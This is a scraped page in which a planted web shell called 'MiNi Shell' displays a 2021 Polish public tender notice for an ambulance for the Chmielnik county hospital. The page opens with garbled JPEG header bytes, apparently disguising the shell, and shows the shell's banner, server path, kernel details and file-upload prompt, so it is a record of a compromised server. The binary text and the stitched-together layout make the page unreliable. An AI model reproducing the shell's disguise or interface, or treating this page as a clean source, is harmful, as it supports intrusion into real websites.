JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210513/0005346601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00053466 z dnia 2021-05-13</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWA AMBULANSU TYPU A2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Powiatowy w Chmielniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003680113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kielecka, 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chmielnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41/354 20 17 wew. 150</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szpital-chmielnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital-chmielnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWA AMBULANSU TYPU A2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-942ee344-b3c2-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00053466</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00029541/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Zakup ambulansu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.szpital-chmielnik.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.szpital-chmielnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcamiodbywasię przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ , ePUAPuhttps://epuap.gov.pl/wps/portal orazpoczty elektronicznej z zastrzeżeniem, że złożenie oferty następujewyłącznie przy użyciuminiPortalu.b) Zamawiający wyznacza następujące osoby do kontaktu zWykonawcami: - w sprawachdotyczących przedmiotu zamówienia – Kierownik LaboratoriumDiagnostycznego, tel. 41/354-30-23wew. 266, 268,- w sprawach proceduralnych - DziałAdministracyjno Techniczny tel. 41/354-20-17wew. 140 lub 150, e- mail przetargi@szpital-chmielnik.plc) Wykonawca zamierzający wziąć udział wpostępowaniu o udzielenie zamówienia publicznego, musiposiadać konto na ePUAP. Wykonawcaposiadający konto na ePUAP ma dostęp do formularzy:złożenia, zmiany, wycofania oferty lub wnioskuoraz do formularza do komunikacji.d) Wymaganiatechniczne i organizacyjne wysyłania i odbieraniadokumentów elektronicznych, elektronicznych kopiidokumentów i oświadczeń oraz informacjiprzekazywanych przy ich użyciu opisane zostały wRegulaminie korzystania z miniPortalu orazRegulaminie ePUAP. e) Maksymalny rozmiar plikówprzesyłanych za pośrednictwem dedykowanychformularzy do: złożenia, zmiany, wycofania oferty lubwniosku oraz do komunikacji wynosi 150 MB. f)Za datę przekazania oferty, wniosków, zawiadomień,dokumentów elektronicznych, oświadczeń lubelektronicznych kopii dokumentów lub oświadczeń orazinnych informacji przyjmuje się datę ichprzekazania na ePUAP.g) Identyfikator postępowania i kluczpubliczny dla danego postępowania oudzielenie zamówienia dostępne są na Liście wszystkichpostępowań na miniPortalu oraz stanowizałącznik do niniejszej SWZ. h) Zamawiający udostępni ofertyoraz protokół postępowania wraz zzałącznikami po wcześniejszym uzgodnieniu terminu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:a) administratorem Pani/Pana danychosobowych jestSzpital Powiatowy w Chmielniku;b) administrator wyznaczył Inspektora DanychOsobowych, z którymmożna się kontaktować pod adresem e-mail: jarek.dziurda@szpital-chmielnik.pl;c) Pani/Pana daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celuzwiązanym zprzedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym wtrybieprzetargu nieograniczonego.d) odbiorcami Pani/Pana danych osobowych będą osoby lubpodmioty,którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawyP.Z.P.e)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowyprzekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;f) obowiązek podaniaprzezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiemustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu oudzieleniezamówienia publicznego.g) w odniesieniu do Pani/Pana danych osobowych decyzje niebędąpodejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.h) posiada Pani/Pan:-napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (wprzypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmierniedużego wysiłkumoże zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mającychna celusprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania oudzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub datyzakończonegopostępowania o udzielenie zamówienia);- na podstawie art. 16 RODO prawo dosprostowaniaPani/Pana danych osobowych skorzystanie z prawa do sprostowania nie może skutkowaćzmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowywzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu orazjegozałączników);- na podstawie art. 18 RODO prawo żądania od administratoraograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania oudzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osobyfizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lubpaństwaczłonkowskiego);- prawo do wniesienia skargi do Prezesa Urzędu Ochrony DanychOsobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących naruszaprzepisyRODO;i) nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo dousunięciadanych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20RODO;- napodstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawąprawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;j)przysługujePani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODOprzetwarzaniePani/Pana danych osobowych przez administratora. Organem właściwym dlaprzedmiotowej skargi jestUrząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/26/PN/05/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa ambulansu typu A2 dla Szpitala Powiatowego w Chmielniku o parametrach zgodnych z wymaganiami opisanymi w szczegółowym opisie zamówienia, formularzu parametrów wymaganych w załączniku nr 2 do SWZ. Oferowany ambulans musi być wykonany na pojeździe typu furgon.Ambulans ma być wyposażony w następujący sprzęt medyczny-	nosze – 1 sztuka,-	transporter noszy – 1 sztuka,-	krzesło transportowe – 1 sztuka </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114121-3 - Karetki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne ambulansu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie obejmującym warunek zdolności zawodowej wykonawca potwierdzi warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie - wykonał należycie co najmniej 3 (trzy) dostawy ambulansów typu A2 z wyposażeniem medycznym, rozumiane jako trzy umowy, o wartości nie mniejszej niż 250.000,00 PLN (dwieście pięćdziesiąt tysięcy) brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu - załączniki numer 4 i 5 do SWZ. Oświadczenia te stanowią dowody potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujące wymagane podmiotowe środki dowodowe (jeżeli takie są wymagane w niniejszej SWZ). Oświadczenie składają odrębnie wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W zakresie obejmującym warunek zdolności zawodowej wykonawca potwierdzi warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie - wykonał należycie co najmniej 3 (trzy) dostawy ambulansów typu A2 z wyposażeniem medycznym, rozumiane jako trzy umowy, o wartości nie mniejszej niż 250.000,00 PLN (dwieście pięćdziesiąt tysięcy) brutto każda. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W zakresie obejmującym warunek zdolności zawodowej wykonawca potwierdzi warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie - wykonał należycie co najmniej 3 (trzy) dostawy ambulansów typu A2 z wyposażeniem medycznym, rozumiane jako trzy umowy, o wartości nie mniejszej niż 250.000,00 PLN (dwieście pięćdziesiąt tysięcy) brutto każda. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału wpostępowaniu - załączniki numer 4 i 5 do SWZ. Oświadczenia te stanowiądowodypotwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału wpostępowaniu,na dzień składania ofert, tymczasowo zastępujące wymagane podmiotowe środkidowodowe(jeżeli takie są wymagane w niniejszej SWZ). Oświadczenie składająodrębniewykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzieleniezamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcyoraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy zwykonawców wykazuje spełnianie warunków udziału w postępowaniu.2. Formularz parametrów technicznych -(załącznik nr 2 do SWZ) 3. Formularz „Parametry oceniane” - (załącznik nr 3 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający określa kwotę wadium w wysokości nie większej niż 3% wartości zamówienia, tj. wymaga wniesienia wadium w wysokości - 5.000,00 zł (słownie: pięć tysięcy złotych) Wadium może być wnoszone w jednej lub kilku następujących formach: pieniądzu; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.Wtakimprzypadku:•Wykonawcy występujący wspólnie są zobowiązani doustanowieniapełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowaniaich wpostępowaniu i zawarcia umowy w sprawie przedmiotowego zamówieniapublicznego.Pełnomocnictwo winno być załączone do oferty. • Wykonawcy wspólnie ubiegającysię oudzielenie zamówienia dołączajądo oferty oświadczenie, z którego wynika, którerobotybudowlane/dostawy/usługi wykonają poszczególni Wykonawcy.• Jeżeli została wybranaofertawykonawców wspólnie ubiegającychsię o udzielenie zamówienia, zamawiający możeżądaćprzed zawarciem umowy w sprawie zamówienia publicznego kopii umowyregulującejwspółpracę tych wykonawców.•Wszelka korespondencja będzie prowadzonaprzezzamawiającego wyłącznie z pełnomocnikiem.b) Potencjał podmiotu trzeciego Wcelupotwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegaćnapotencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp.Podmiottrzeci, na potencjał którego wykonawca powołuje się w celu wykazania spełnieniawarunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1ustawyPzp c)PodwykonawstwoZamawiający nie zastrzega obowiązku osobistego wykonania przezwykonawcę kluczowychzadań / części zamówienia. Wykonawca może powierzyćwykonanieczęści zamówieniapodwykonawcy (podwykonawcom). Zamawiający wymaga, aby wprzypadkupowierzenia częścizamówienia podwykonawcom, Wykonawca wskazał w ofercieczęścizamówienia, którychOgłoszenie nr 2021/BZP 00016579/01 z dnia 2021-03-122021-03-12Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest wtrybiepodstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawywykonanie zamierzapowierzyćpodwykonawcom oraz podał (o ile są mu wiadome na tymetapie) nazwy (firmy)tychpodwykonawców. Zamawiający nie będzie badał czy zachodząpodstawy wykluczeniawskazanew art. 108) u.p.z.p. do ujawnionych przez Wykonawcępodwykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranejoferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy,stanowiącym Załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną przy użyciu Miniportalu - https://miniportal.uzp.gov.pl/; e-Puapu - https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-21</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-13 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com